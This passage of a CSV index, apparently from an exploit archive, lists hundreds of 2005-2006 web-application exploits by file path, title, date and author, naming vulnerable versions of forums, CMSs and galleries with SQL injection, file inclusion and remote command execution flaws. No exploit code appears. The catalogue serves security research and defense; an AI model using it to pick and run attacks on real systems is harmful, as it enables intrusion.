'vBulletin/IPB' SQL Injection",2005-11-06,B~HFH,php,webapps, -1298,exploits/php/webapps/1298.php,"ATutor 1.5.1pl2 - SQL Injection / Command Execution",2005-11-07,rgod,php,webapps, -1312,exploits/php/webapps/1312.php,"Moodle 1.6dev - SQL Injection / Command Execution",2005-11-10,rgod,php,webapps, -1315,exploits/php/webapps/1315.php,"XOOPS (wfdownloads) 2.05 Module - Multiple Vulnerabilities",2005-11-12,rgod,php,webapps, -1317,exploits/php/webapps/1317.py,"Coppermine Photo Gallery 1.3.2 - File Retrieval / SQL Injection",2005-11-13,DiGiTAL_MiDWAY,php,webapps, -1319,exploits/php/webapps/1319.php,"Unclassified NewsBoard 1.5.3 Patch 3 - Blind SQL Injection",2005-11-14,rgod,php,webapps, -1320,exploits/php/webapps/1320.txt,"Arki-DB 1.0 - 'catid' SQL Injection",2005-11-14,Devil-00,php,webapps, -1321,exploits/php/webapps/1321.pl,"Cyphor 0.19 - 'show.php?id' SQL Injection",2005-11-14,"HACKERS PAL",php,webapps, -1322,exploits/php/webapps/1322.pl,"Wizz Forum 1.20 - 'TopicID' SQL Injection",2005-11-14,"HACKERS PAL",php,webapps, -1324,exploits/php/webapps/1324.php,"PHPWebThings 1.4 - 'msg'/'forum' SQL Injection",2005-11-16,rgod,php,webapps, -1325,exploits/php/webapps/1325.pl,"PHPWebThings 1.4 - 'forum' SQL Injection",2005-11-16,AhLam,php,webapps, -1326,exploits/php/webapps/1326.pl,"PHP-Nuke 7.8 Search Module - SQL Injection",2005-11-16,anonymous,php,webapps, -1329,exploits/php/webapps/1329.php,"EkinBoard 1.0.3 - '/config.php' SQL Injection / Command Execution",2005-11-17,rgod,php,webapps, -1337,exploits/php/webapps/1337.php,"Mambo 4.5.2 - Globals Overwrite / Remote Command Execution",2005-11-22,rgod,php,webapps, -1340,exploits/php/webapps/1340.php,"eFiction 2.0 - Fake '.GIF' Arbitrary File Upload",2005-11-25,rgod,php,webapps, -1342,exploits/php/webapps/1342.php,"Guppy 4.5.9 - 'REMOTE_ADDR' Remote Commands Execution",2005-11-28,rgod,php,webapps, -1354,exploits/php/webapps/1354.php,"Zen Cart 1.2.6d - 'password_forgotten.php' SQL Injection",2005-12-02,rgod,php,webapps, -1356,exploits/php/webapps/1356.php,"DoceboLms 2.0.4 - 'connector.php' Arbitrary File Upload",2005-12-04,rgod,php,webapps, -1358,exploits/php/webapps/1358.php,"SimpleBBS 1.1 - Remote Commands Execution",2005-12-06,rgod,php,webapps, -1359,exploits/php/webapps/1359.php,"SugarSuite Open Source 4.0beta - Remote Code Execution (1)",2005-12-07,rgod,php,webapps, -1361,exploits/php/webapps/1361.c,"SimpleBBS 1.1 - Remote Commands Execution (C)",2005-12-07,unitedasia,php,webapps, -1363,exploits/php/webapps/1363.php,"Website Baker 2.6.0 - Authentication Bypass / Remote Code Execution",2005-12-08,rgod,php,webapps, -1364,exploits/php/webapps/1364.c,"SugarSuite Open Source 4.0beta - Remote Code Execution (2)",2005-12-08,pointslash,php,webapps, -1367,exploits/php/webapps/1367.php,"Flatnuke 2.5.6 - Privilege Escalation / Remote Commands Execution",2005-12-10,rgod,php,webapps, -1370,exploits/php/webapps/1370.php,"phpCOIN 1.2.2 - 'phpcoinsessid' SQL Injection / Remote Code Execution",2005-12-12,rgod,php,webapps, -1373,exploits/php/webapps/1373.php,"Limbo 1.0.4.2 - '_SERVER[REMOTE_ADDR]' Remote Command Execution",2005-12-14,rgod,php,webapps, -1379,exploits/php/webapps/1379.php,"PHPGedView 3.3.7 - Remote Code Execution",2005-12-20,rgod,php,webapps, -1382,exploits/php/webapps/1382.pl,"phpBB 2.0.18 - Remote Brute Force/Dictionary (2)",2006-02-20,DarkFig,php,webapps, -1383,exploits/php/webapps/1383.txt,"phpBB 2.0.18 - Cross-Site Scripting / Cookie Disclosure",2005-12-21,jet,php,webapps, -1385,exploits/php/webapps/1385.pl,"PHP-Fusion 6.00.3 - 'rating' SQL Injection",2005-12-23,krasza,php,webapps, -1387,exploits/php/webapps/1387.php,"Dev Web Management System 1.5 - 'cat' SQL Injection",2005-12-24,rgod,php,webapps, -1388,exploits/php/webapps/1388.pl,"phpBB 2.0.17 - 'signature_bbcode_uid' Remote Command",2005-12-24,RusH,php,webapps, -1395,exploits/php/webapps/1395.php,"phpDocumentor 1.3.0 rc4 - Remote Commands Execution",2005-12-29,rgod,php,webapps, -1398,exploits/php/webapps/1398.pl,"CubeCart 3.0.6 - Remote Command Execution",2005-12-30,cijfer,php,webapps, -1399,exploits/asp/webapps/1399.txt,"WebWiz Products 1.0/3.06 - Authentication Bypass / SQL Injection",2005-12-30,DevilBox,asp,webapps, -1400,exploits/php/webapps/1400.pl,"CuteNews 1.4.1 - 'categories.mdu' Remote Command Execution",2006-01-01,cijfer,php,webapps, -1401,exploits/php/webapps/1401.pl,"Valdersoft Shopping Cart 3.0 - Remote Command Execution",2006-01-03,cijfer,php,webapps, -1405,exploits/php/webapps/1405.pl,"FlatCMS 1.01 - 'file_editor.php' Remote Command Execution",2006-01-04,cijfer,php,webapps, -1410,exploits/php/webapps/1410.pl,"Magic News Plus 1.0.3 - Admin Pass Change",2006-01-09,cijfer,php,webapps, -1418,exploits/asp/webapps/1418.txt,"MiniNuke 1.8.2 - Multiple SQL Injections",2006-01-14,nukedx,asp,webapps, -1419,exploits/asp/webapps/1419.pl,"MiniNuke 1.8.2 - 'hid' SQL Injection",2006-01-14,DetMyl,asp,webapps, -1442,exploits/php/webapps/1442.pl,"EZDatabase 2.0 - 'db_id' Remote Command Execution",2006-01-22,cijfer,php,webapps, -1446,exploits/php/webapps/1446.pl,"creLoaded 6.15 - 'HTMLAREA' Automated Perl",2006-01-24,kaneda,php,webapps, -1453,exploits/php/webapps/1453.pl,"Phpclanwebsite 1.23.1 - SQL Injection",2006-01-25,matrix_killer,php,webapps, -1457,exploits/php/webapps/1457.txt,"phpBB 2.0.19 - Cross-Site Scripting Remote Cookie Disclosure",2006-01-29,threesixthousan,php,webapps, -1459,exploits/php/webapps/1459.pl,"xeCMS 1.0.0 RC 2 - 'cookie' Remote Command Execution",2006-01-30,cijfer,php,webapps, -1461,exploits/php/webapps/1461.pl,"Invision Power Board Dragoran Portal Mod 1.3 - SQL Injection",2006-01-31,SkOd,php,webapps, -1467,exploits/php/webapps/1467.php,"LoudBlog 0.4 - Remote File Inclusion",2006-02-03,rgod,php,webapps, -1468,exploits/php/webapps/1468.php,"Clever Copy 3.0 - Admin Auth Details / SQL Injection",2006-02-04,rgod,php,webapps, -1469,exploits/php/webapps/1469.pl,"phpBB 2.0.19 - Style Changer/Demo Mod SQL Injection",2006-02-05,SkOd,php,webapps, -1471,exploits/cgi/webapps/1471.pl,"MyQuiz 1.01 - 'PATH_INFO' Arbitrary Command Execution",2006-02-06,Hessam-x,cgi,webapps, -1472,exploits/asp/webapps/1472.pl,"ASPThai.Net Guestbook 5.5 - Authentication Bypass",2006-02-06,Zodiac,asp,webapps, -1478,exploits/php/webapps/1478.php,"CPGNuke Dragonfly 9.0.6.1 - Remote Commands Execution",2006-02-08,rgod,php,webapps, -1482,exploits/php/webapps/1482.php,"SPIP 1.8.2g - Remote Commands Execution",2006-02-08,rgod,php,webapps, -1484,exploits/php/webapps/1484.php,"FCKEditor 2.0 < 2.2 - 'FileManager connector.php' Arbitrary File Upload",2006-02-09,rgod,php,webapps, -1485,exploits/php/webapps/1485.php,"RunCMS 1.2 - 'class.forumposts.php' Remote File Inclusion",2006-02-09,rgod,php,webapps, -1491,exploits/php/webapps/1491.php,"DocMGR 0.54.2 - 'file_exists' Remote Commands Execution",2006-02-11,rgod,php,webapps, -1492,exploits/php/webapps/1492.php,"Invision Power Board Army System Mod 2.1 - SQL Injection",2006-02-13,fRoGGz,php,webapps, -1493,exploits/php/webapps/1493.php,"EnterpriseGS 1.0 rc4 - Remote Commands Execution",2006-02-13,rgod,php,webapps, -1494,exploits/php/webapps/1494.php,"FlySpray 0.9.7 - 'install-0.9.7.php' Remote Commands Execution",2006-02-13,rgod,php,webapps, -1498,exploits/php/webapps/1498.php,"webSPELL 4.01 - 'title_op' SQL Injection",2006-02-14,x128,php,webapps, -1499,exploits/php/webapps/1499.pl,"MyBulletinBoard (MyBB) 1.03 - Multiple SQL Injections",2006-02-15,"HACKERS PAL",php,webapps, -1501,exploits/php/webapps/1501.php,"PHPKIT 1.6.1R2 - 'filecheck' Remote Commands Execution",2006-02-16,rgod,php,webapps, -1503,exploits/php/webapps/1503.pl,"YapBB 1.2 - 'cfgIncludeDirectory' Remote Command Execution",2006-02-16,cijfer,php,webapps, -1508,exploits/cgi/webapps/1508.pl,"AWStats < 6.4 - 'referer' Remote Command Execution",2006-02-17,RusH,cgi,webapps, -1509,exploits/php/webapps/1509.pl,"Zorum Forum 3.5 - 'rollid' SQL Injection",2006-02-17,RusH,php,webapps, -1510,exploits/php/webapps/1510.pl,"Gravity Board X 1.1 - 'csscontent' Remote Code Execution",2006-02-17,RusH,php,webapps, -1511,exploits/php/webapps/1511.php,"Coppermine Photo Gallery 1.4.3 - Remote Commands Execution",2006-02-17,rgod,php,webapps, -1512,exploits/php/webapps/1512.pl,"Admbook 1.2.2 - 'x-forwarded-for' Remote Command Execution",2006-02-19,rgod,php,webapps, -1513,exploits/php/webapps/1513.php,"BXCP 0.2.9.9 - 'tid' SQL Injection",2006-02-19,x128,php,webapps, -1514,exploits/asp/webapps/1514.pl,"MiniNuke 1.8.2b - 'pages.asp' SQL Injection",2006-02-19,nukedx,asp,webapps, -1515,exploits/php/webapps/1515.pl,"GeekLog 1.x - 'error.log' (gpc = Off) Remote Commands Execution",2006-02-20,rgod,php,webapps, -1516,exploits/php/webapps/1516.php,"ilchClan 1.05g - 'tid' SQL Injection",2006-02-20,x128,php,webapps, -1521,exploits/php/webapps/1521.php,"Noahs Classifieds 1.3 - 'lowerTemplate' Remote Code Execution",2006-02-22,trueend5,php,webapps, -1522,exploits/php/webapps/1522.php,"NOCC Webmail 1.0 - Local File Inclusion / Remote Code Execution",2006-02-23,rgod,php,webapps, -1523,exploits/php/webapps/1523.cpp,"PHP-Nuke 7.5 < 7.8 - 'Search' SQL Injection",2006-02-23,unitedbr,php,webapps, -1524,exploits/php/webapps/1524.html,"VHCS 2.4.7.1 - Add User Authentication Bypass",2006-02-23,RoMaNSoFt,php,webapps, -1525,exploits/php/webapps/1525.pl,"phpWebSite 0.10.0-full - 'topics.php' SQL Injection",2006-02-24,SnIpEr_SA,php,webapps, -1526,exploits/php/webapps/1526.php,"Lansuite 2.1.0 Beta - 'fid' SQL Injection",2006-02-24,x128,php,webapps, -1527,exploits/php/webapps/1527.pl,"iGENUS WebMail 2.0.2 - 'config_inc.php' Remote Code Execution",2006-02-25,rgod,php,webapps, -1528,exploits/asp/webapps/1528.pl,"Pentacle In-Out Board 6.03 - 'newsdetailsview' SQL Injection",2006-02-25,nukedx,asp,webapps, -1529,exploits/asp/webapps/1529.html,"Pentacle In-Out Board 6.03 - 'login.asp' Remote Authentication Bypass",2006-02-25,nukedx,asp,webapps, -1530,exploits/php/webapps/1530.pl,"saPHP Lesson 2.0 - 'forumid' SQL Injection",2006-02-25,SnIpEr_SA,php,webapps, -1532,exploits/php/webapps/1532.pl,"PwsPHP 1.2.3 - 'index.php' SQL Injection",2006-02-25,papipsycho,php,webapps, -1533,exploits/php/webapps/1533.php,"4Images 1.7.1 - Local File Inclusion / Remote Code Execution",2006-02-26,rgod,php,webapps, -1538,exploits/php/webapps/1538.pl,"Farsinews 2.5 - Directory Traversal Arbitrary 'users.db' Access",2006-02-28,Hessam-x,php,webapps, -1539,exploits/php/webapps/1539.txt,"MyBulletinBoard (MyBB) 1.03 - 'misc.php' SQL Injection",2006-02-28,Devil-00,php,webapps, -1541,exploits/php/webapps/1541.pl,"Limbo CMS 1.0.4.2 - 'itemID' Remote Code Execution",2006-03-01,str0ke,php,webapps, -1542,exploits/php/webapps/1542.pl,"phpRPC Library 0.7 - XML Data Decoding Remote Code Execution (1)",2006-03-01,LorD,php,webapps, -1543,exploits/php/webapps/1543.pl,"vuBB 0.2 Final - 'cookie' SQL Injection",2006-03-01,KingOfSka,php,webapps, -1544,exploits/php/webapps/1544.pl,"Woltlab Burning Board 2.x - Datenbank MOD 'fileid' SQL Injection",2006-03-01,nukedx,php,webapps, -1546,exploits/php/webapps/1546.pl,"phpRPC Library 0.7 - XML Data Decoding Remote Code Execution (2)",2006-03-02,cijfer,php,webapps, -1547,exploits/php/webapps/1547.txt,"Aztek Forum 4.00 - Cross-Site Scripting / SQL Injection",2006-03-02,lorenzo,php,webapps, -1548,exploits/php/webapps/1548.pl,"MyBulletinBoard (MyBB) 1.04 - 'misc.php' SQL Injection (2)",2006-03-03,Devil-00,php,webapps, -1549,exploits/php/webapps/1549.php,"PHP-Stats 0.1.9.1 - Remote Commands Execution",2006-03-04,rgod,php,webapps, -1550,exploits/asp/webapps/1550.txt,"TotalECommerce 1.0 - 'index.asp?id' SQL Injection",2006-03-04,nukedx,asp,webapps, -1553,exploits/php/webapps/1553.pl,"Fantastic News 2.1.2 - 'script_path' Remote Code Execution",2006-03-04,uid0,php,webapps, -1556,exploits/php/webapps/1556.pl,"D2-Shoutbox 4.2 IPB Mod - 'load' SQL Injection",2006-03-06,SkOd,php,webapps, -1561,exploits/php/webapps/1561.pl,"OWL Intranet Engine 0.82 - 'xrms_file_root' Code Execution",2006-03-07,rgod,php,webapps, -1562,exploits/asp/webapps/1562.pl,"CilemNews System 1.1 - 'yazdir.asp' haber_id SQL Injection",2006-03-07,nukedx,asp,webapps, -1563,exploits/php/webapps/1563.pm,"Limbo CMS 1.0.4.2 - 'itemID' Remote Code Execution (Metasploit)",2006-03-07,sirh0t,php,webapps, -1566,exploits/php/webapps/1566.php,"Gallery 2.0.3 - stepOrder[] Remote Commands Execution",2006-03-08,rgod,php,webapps, -1567,exploits/php/webapps/1567.php,"RedBLoG 0.5 - 'cat_id' SQL Injection",2006-03-08,x128,php,webapps, -1569,exploits/asp/webapps/1569.pl,"d2kBlog 1.0.3 - 'memName' SQL Injection",2006-03-09,DevilBox,asp,webapps, -1570,exploits/php/webapps/1570.pl,"Light Weight Calendar 1.x - 'date' Remote Code Execution",2006-03-09,Hessam-x,php,webapps, -1571,exploits/asp/webapps/1571.html,"JiRos Banner Experience 1.0 - Unauthorised Create Admin",2006-03-09,nukedx,asp,webapps, -1575,exploits/php/webapps/1575.pl,"Guestbook Script 1.7 - 'include_files' Remote Code Execution",2006-03-11,rgod,php,webapps, -1576,exploits/php/webapps/1576.txt,"Jupiter CMS 1.1.5 - Multiple Cross-Site Scripting Vulnerabilities",2006-03-11,Nomenumbra,php,webapps, -1581,exploits/php/webapps/1581.pl,"Simple PHP Blog 0.4.7.1 - Remote Command Execution",2006-03-13,rgod,php,webapps, -1585,exploits/php/webapps/1585.php,"PHP iCalendar 2.21 - 'cookie' Remote Code Execution",2006-03-15,rgod,php,webapps, -1586,exploits/php/webapps/1586.php,"PHP iCalendar 2.21 - 'publish.ical.php' Remote Code Execution",2006-03-15,rgod,php,webapps, -1587,exploits/php/webapps/1587.pl,"KnowledgebasePublisher 1.2 - 'Include' Remote Code Execution",2006-03-15,uid0,php,webapps, -1588,exploits/php/webapps/1588.php,"nodez 4.6.1.1 mercury - Multiple Vulnerabilities",2006-03-18,rgod,php,webapps, -1589,exploits/asp/webapps/1589.pl,"BetaParticle Blog 6.0 - 'fldGalleryID' SQL Injection",2006-03-18,nukedx,asp,webapps, -1590,exploits/php/webapps/1590.pl,"ShoutLIVE 1.1.0 - 'savesettings.php' Remote Code Execution",2006-03-18,DarkFig,php,webapps, -1594,exploits/php/webapps/1594.py,"SoftBB 0.1 - 'mail' Blind SQL Injection",2006-03-19,LOTFREE,php,webapps, -1595,exploits/php/webapps/1595.php,"gCards 1.45 - Multiple Vulnerabilities",2006-03-20,rgod,php,webapps, -1597,exploits/asp/webapps/1597.pl,"ASPPortal 3.1.1 - 'downloadid' SQL Injection",2006-03-20,nukedx,asp,webapps, -1600,exploits/php/webapps/1600.php,"FreeWPS 2.11 - 'images.php' Remote Code Execution",2006-03-21,x128,php,webapps, -1605,exploits/php/webapps/1605.php,"XHP CMS 0.5 - 'upload' Remote Command Execution",2006-03-22,rgod,php,webapps, -1608,exploits/php/webapps/1608.php,"WebAlbum 2.02pl - COOKIE[skin2] Remote Code Execution",2006-03-25,rgod,php,webapps, -1609,exploits/php/webapps/1609.pl,"PHP Ticket 0.71 - 'search.php' SQL Injection",2006-03-25,undefined1_,php,webapps, -1610,exploits/php/webapps/1610.txt,"phpBookingCalendar 1.0c - 'details_view.php' SQL Injection",2006-03-25,undefined1_,php,webapps, -1611,exploits/php/webapps/1611.pl,"TFT Gallery 0.10 - Password Disclosure",2006-03-25,undefined1_,php,webapps, -1612,exploits/php/webapps/1612.php,"CuteNews 1.4.1 - 'function.php' Local File Inclusion",2006-03-26,"Hamid Ebadi",php,webapps, -1616,exploits/php/webapps/1616.pl,"Aztek Forum 4.0 - 'myadmin.php' User Privilege Escalation",2006-03-26,Sparah,php,webapps, -1617,exploits/php/webapps/1617.php,"PHPCollab 2.x / NetOffice 2.x - 'sendpassword.php' SQL Injection",2006-03-28,rgod,php,webapps, -1618,exploits/php/webapps/1618.c,"GreyMatter WebLog 1.21d - Remote Command Execution (1)",2006-03-28,No_Face_King,php,webapps, -1619,exploits/php/webapps/1619.pl,"GreyMatter WebLog 1.21d - Remote Command Execution (2)",2006-03-28,Hessam-x,php,webapps, -1621,exploits/php/webapps/1621.php,"Plogger Beta 2.1 - Administrative Credentials Disclosure",2006-03-28,rgod,php,webapps, -1623,exploits/asp/webapps/1623.pl,"EzASPSite 2.0 RC3 - 'Scheme' SQL Injection",2006-03-29,nukedx,asp,webapps, -1627,exploits/php/webapps/1627.php,"Claroline 1.7.4 - 'scormExport.inc.php' Remote Code Execution",2006-03-30,rgod,php,webapps, -1629,exploits/php/webapps/1629.pl,"SQuery 4.5 - 'libpath' Remote File Inclusion",2006-04-01,uid0,php,webapps, -1630,exploits/php/webapps/1630.pl,"PHPNuke-Clan 3.0.1 - 'vwar_root2' Remote File Inclusion",2006-04-01,uid0,php,webapps, -1631,exploits/php/webapps/1631.php,"ReloadCMS 1.2.5 - Cross-Site Scripting / Remote Code Execution",2006-04-02,rgod,php,webapps, -1632,exploits/php/webapps/1632.pl,"VWar 1.5.0 R12 - Remote File Inclusion",2006-04-02,uid0,php,webapps, -1640,exploits/php/webapps/1640.pl,"AngelineCMS 0.8.1 - 'installpath' Remote File Inclusion",2006-04-04,K-159,php,webapps, -1644,exploits/php/webapps/1644.pl,"INDEXU 5.0.1 - 'base_path' Remote File Inclusion",2006-04-04,K-159,php,webapps, -1645,exploits/php/webapps/1645.pl,"Crafty Syntax Image Gallery 3.1g - Remote Code Execution",2006-04-04,undefined1_,php,webapps, -1646,exploits/php/webapps/1646.php,"phpMyChat 0.14.5 - SYS enter Remote Code Execution",2006-04-05,rgod,php,webapps, -1647,exploits/php/webapps/1647.php,"phpMyChat 0.15.0dev - SYS enter Remote Code Execution",2006-04-06,rgod,php,webapps, -1650,exploits/php/webapps/1650.pl,"Horde Help Viewer 3.1 - Remote Command Execution",2006-04-07,deese,php,webapps, -1652,exploits/php/webapps/1652.php,"ADODB < 4.70 (PHPOpenChat 3.0.x) - 'Server.php' SQL Injection",2006-04-09,rgod,php,webapps, -1653,exploits/php/webapps/1653.txt,"dnGuestbook 2.0 - SQL Injection",2006-04-09,snatcher,php,webapps, -1654,exploits/php/webapps/1654.txt,"autonomous lan party 0.98.1.0 - Remote File Inclusion",2006-04-09,Codexploder,php,webapps, -1655,exploits/php/webapps/1655.php,"XBrite Members 1.1 - 'id' SQL Injection",2006-04-09,snatcher,php,webapps, -1656,exploits/php/webapps/1656.txt,"Sire 2.0 - '/lire.php' Remote File Inclusion / Arbitrary File Upload",2006-04-09,simo64,php,webapps, -1659,exploits/php/webapps/1659.php,"phpList 2.10.2 - GLOBALS[] Remote Code Execution",2006-04-10,rgod,php,webapps, -1660,exploits/php/webapps/1660.pm,"Horde 3.0.9/3.1.0 - Help Viewer Remote Code Execution (Metasploit)",2006-04-10,Inkubus,php,webapps, -1661,exploits/php/webapps/1661.pl,"phpBB 2.0.19 - 'user_sig_bbcode_uid' Remote Code Execution",2006-04-10,RusH,php,webapps, -1662,exploits/php/webapps/1662.php,"Clansys 1.1 (showid) - SQL Injection",2006-04-10,snatcher,php,webapps, -1663,exploits/php/webapps/1663.php,"Simplog 0.9.2 - 's' Remote Commands Execution",2006-04-11,rgod,php,webapps, -1665,exploits/php/webapps/1665.pl,"Sphider 1.3 - 'configset.php' Remote File Inclusion",2006-04-12,rgod,php,webapps, -1666,exploits/php/webapps/1666.php,"PHP121 Instant Messenger 1.4 - Remote Code Execution",2006-04-12,rgod,php,webapps, -1668,exploits/php/webapps/1668.php,"vBulletin ImpEx 1.74 - Remote Command Execution",2006-04-13,ReZEN,php,webapps, -1669,exploits/cgi/webapps/1669.pl,"Censtore 7.3.x - 'censtore.cgi' Remote Command Execution",2006-04-13,FOX_MULDER,cgi,webapps, -1670,exploits/cgi/webapps/1670.pl,"quizz 1.01 - 'quizz.pl' Remote Command Execution",2006-04-13,FOX_MULDER,cgi,webapps, -1672,exploits/php/webapps/1672.pl,"PAJAX 0.5.1 - Remote Code Execution",2006-04-13,Stoney,php,webapps, -1673,exploits/php/webapps/1673.php,"phpWebSite 0.10.2 - 'hub_dir' Remote Commands Execution",2006-04-14,rgod,php,webapps, -1674,exploits/php/webapps/1674.txt,"osCommerce 2.2 - 'extras' Source Code Disclosure",2006-04-14,rgod,php,webapps, -1677,exploits/cgi/webapps/1677.php,"SysInfo 1.21 - 'sysinfo.cgi' Remote Command Execution",2006-04-14,rgod,cgi,webapps, -1678,exploits/php/webapps/1678.php,"PHP Album 0.3.2.3 - Remote Command Execution",2006-04-15,rgod,php,webapps, -1680,exploits/cgi/webapps/1680.pm,"Symantec Sygate Management Server - 'LOGIN' SQL Injection (Metasploit)",2006-04-15,Nicob,cgi,webapps, -1682,exploits/php/webapps/1682.php,"Fuju News 1.0 - Authentication Bypass / SQL Injection",2006-04-16,snatcher,php,webapps, -1683,exploits/php/webapps/1683.php,"Blackorpheus ClanMemberSkript 1.0 - SQL Injection",2006-04-16,snatcher,php,webapps, -1686,exploits/php/webapps/1686.pl,"FlexBB 0.5.5 - '/inc/start.php?_COOKIE' SQL Bypass",2006-04-17,Devil-00,php,webapps, -1687,exploits/php/webapps/1687.txt,"MyEvent 1.3 - 'event.php' Remote File Inclusion",2006-04-17,botan,php,webapps, -1694,exploits/php/webapps/1694.pl,"Internet PhotoShow 1.3 - 'page' Remote File Inclusion",2006-04-18,Hessam-x,php,webapps, -1695,exploits/php/webapps/1695.pl,"PHP Net Tools 2.7.1 - Remote Code Execution",2006-04-18,FOX_MULDER,php,webapps, -1697,exploits/php/webapps/1697.php,"PCPIN Chat 5.0.4 - 'login/language' Remote Code Execution",2006-04-19,rgod,php,webapps, -1698,exploits/php/webapps/1698.php,"Joomla! 1.0.7 / Mambo 4.5.3 - 'feed' Full Path Disclosure / Denial of Service",2006-04-19,trueend5,php,webapps, -1699,exploits/php/webapps/1699.txt,"RechnungsZentrale V2 < 1.1.3 - Remote File Inclusion",2006-04-19,"GroundZero Security",php,webapps, -1700,exploits/asp/webapps/1700.pl,"ASPSitem 1.83 - 'Haberler.asp' SQL Injection",2006-04-19,nukedx,asp,webapps, -1701,exploits/php/webapps/1701.php,"PHPSurveyor 0.995 - 'surveyid' Remote Command Execution",2006-04-20,rgod,php,webapps, -1704,exploits/php/webapps/1704.pl,"CoreNews 2.0.1 - 'userid' SQL Injection",2006-04-21,nukedx,php,webapps, -1705,exploits/php/webapps/1705.pl,"Simplog 0.9.3 - 'tid' SQL Injection",2006-04-21,nukedx,php,webapps, -1706,exploits/php/webapps/1706.txt,"dForum 1.5 - 'DFORUM_PATH' Multiple Remote File Inclusions",2006-04-21,nukedx,php,webapps, -1707,exploits/php/webapps/1707.pl,"My Gaming Ladder Combo System 7.0 - Remote Code Execution",2006-04-22,nukedx,php,webapps, -1710,exploits/php/webapps/1710.txt,"Clansys 1.1 - 'index.php' PHP Code Insertion",2006-04-23,nukedx,php,webapps, -1711,exploits/php/webapps/1711.txt,"Built2Go PHP Movie Review 2B - Remote File Inclusion",2006-04-23,"Camille Myers",php,webapps, -1713,exploits/php/webapps/1713.pl,"FlexBB 0.5.5 - '/function/showprofile.php' SQL Injection",2006-04-24,Devil-00,php,webapps, -1714,exploits/asp/webapps/1714.txt,"BK Forum 4.0 - 'member.asp' SQL Injection",2006-04-24,n0m3rcy,asp,webapps, -1720,exploits/php/webapps/1720.pl,"Invision Power Board 2.1.5 - 'lastdate' Remote Code Execution",2006-04-26,RusH,php,webapps, -1722,exploits/php/webapps/1722.txt,"TopList 1.3.8 - 'phpBB Hack' Remote File Inclusion (1)",2006-04-27,[Oo],php,webapps, -1723,exploits/php/webapps/1723.txt,"Advanced Guestbook 2.4.0 - 'phpBB' File Inclusion",2006-04-28,[Oo],php,webapps, -1724,exploits/php/webapps/1724.pl,"TopList 1.3.8 - 'phpBB Hack' Remote File Inclusion (2)",2006-04-28,FOX_MULDER,php,webapps, -1725,exploits/php/webapps/1725.pl,"Advanced Guestbook 2.4.0 - 'phpBB' Remote File Inclusion",2006-04-28,n0m3rcy,php,webapps, -1726,exploits/php/webapps/1726.pl,"Invision Power Board 2.1.5 - 'search.php' Remote Code Execution",2006-04-29,"Javier Olascoaga",php,webapps, -1727,exploits/php/webapps/1727.txt,"openPHPNuke 2.3.3 - Remote File Inclusion",2006-04-29,[Oo],php,webapps, -1728,exploits/php/webapps/1728.txt,"Knowledge Base Mod 2.0.2 - 'phpBB' Remote File Inclusion",2006-04-29,[Oo],php,webapps, -1729,exploits/php/webapps/1729.txt,"Limbo CMS 1.0.4.2 - 'sql.php' Remote File Inclusion",2006-04-29,[Oo],php,webapps, -1730,exploits/php/webapps/1730.txt,"Aardvark Topsites PHP 4.2.2 - 'path' Remote File Inclusion",2006-04-30,[Oo],php,webapps, -1731,exploits/php/webapps/1731.txt,"phpMyAgenda 3.0 Final - 'rootagenda' Remote File Inclusion",2006-04-30,Aesthetico,php,webapps, -1732,exploits/php/webapps/1732.pl,"Aardvark Topsites PHP 4.2.2 - 'lostpw.php' Remote File Inclusion",2006-04-30,cijfer,php,webapps, -1733,exploits/php/webapps/1733.pl,"Invision Power Board 2.1.5 - 'from_contact' SQL Injection",2006-05-01,"Ykstortion Security",php,webapps, -1738,exploits/php/webapps/1738.php,"X7 Chat 2.0 - 'help_file' Remote Command Execution",2006-05-02,rgod,php,webapps, -1740,exploits/php/webapps/1740.pl,"Fast Click 1.1.3/2.3.8 - 'show.php' Remote File Inclusion",2006-05-02,R@1D3N,php,webapps, -1744,exploits/php/webapps/1744.pl,"Albinator 2.0.6 - 'Config_rootdir' Remote File Inclusion",2006-05-03,webDEViL,php,webapps, -1747,exploits/php/webapps/1747.pl,"Auction 1.3m - 'phpbb_root_path' Remote File Inclusion",2006-05-04,webDEViL,php,webapps, -1751,exploits/php/webapps/1751.php,"Limbo CMS 1.0.4.2 - 'catid' SQL Injection",2006-05-05,[Oo],php,webapps, -1752,exploits/php/webapps/1752.pl,"StatIt 4 - 'statitpath' Remote File Inclusion",2006-05-05,IGNOR3,php,webapps, -1753,exploits/php/webapps/1753.txt,"TotalCalendar 2.30 - 'inc' Remote File Inclusion",2006-05-05,Aesthetico,php,webapps, -1755,exploits/cgi/webapps/1755.py,"AWStats 6.5 - 'migrate' Remote Shell Command Injection",2006-05-06,redsand,cgi,webapps, -1756,exploits/php/webapps/1756.pl,"HiveMail 1.3 - 'addressbook.add.php' Remote Code Execution",2006-05-06,[Oo],php,webapps, -1759,exploits/asp/webapps/1759.txt,"VP-ASP 6.00 - 'shopcurrency.asp' SQL Injection",2006-05-06,tracewar,asp,webapps, -1760,exploits/php/webapps/1760.php,"PHP-Fusion 6.00.306 - Multiple Vulnerabilities",2006-05-07,rgod,php,webapps, -1761,exploits/php/webapps/1761.pl,"Jetbox CMS 2.1 - 'relative_script_path' Remote File Inclusion",2006-05-07,beford,php,webapps, -1763,exploits/php/webapps/1763.txt,"ACal 2.2.6 - 'day.php' Remote File Inclusion",2006-05-07,PiNGuX,php,webapps, -1764,exploits/php/webapps/1764.txt,"EQdkp 1.3.0 - 'dbal.php' Remote File Inclusion",2006-05-07,OLiBekaS,php,webapps, -1765,exploits/php/webapps/1765.pl,"Dokeos Lms 1.6.4 - 'authldap.php' Remote File Inclusion",2006-05-08,beford,php,webapps, -1766,exploits/php/webapps/1766.pl,"Claroline E-Learning 1.75 - 'ldap.inc.php' Remote File Inclusion",2006-05-08,beford,php,webapps, -1767,exploits/php/webapps/1767.txt,"ActualAnalyzer Server 8.23 - 'rf' Remote File Inclusion",2006-05-08,Aesthetico,php,webapps, -1768,exploits/php/webapps/1768.php,"ActualAnalyzer Pro 6.88 - 'rf' Remote File Inclusion",2006-05-08,ReZEN,php,webapps, -1769,exploits/php/webapps/1769.txt,"phpListPro 2.01 - Multiple Remote File Inclusions",2006-05-08,Aesthetico,php,webapps, -1773,exploits/php/webapps/1773.txt,"phpRaid 3.0.b3 - 'phpBB'/'SMF' Remote File Inclusion",2006-05-09,"Kurdish Security",php,webapps, -1774,exploits/php/webapps/1774.txt,"pafileDB 2.0.1 - 'mxBB'/'phpBB' Remote File Inclusion",2006-05-09,Darkfire,php,webapps, -1777,exploits/php/webapps/1777.php,"Unclassified NewsBoard 1.6.1 patch 1 - Local File Inclusion",2006-05-11,rgod,php,webapps, -1778,exploits/php/webapps/1778.txt,"Foing 0.7.0 - 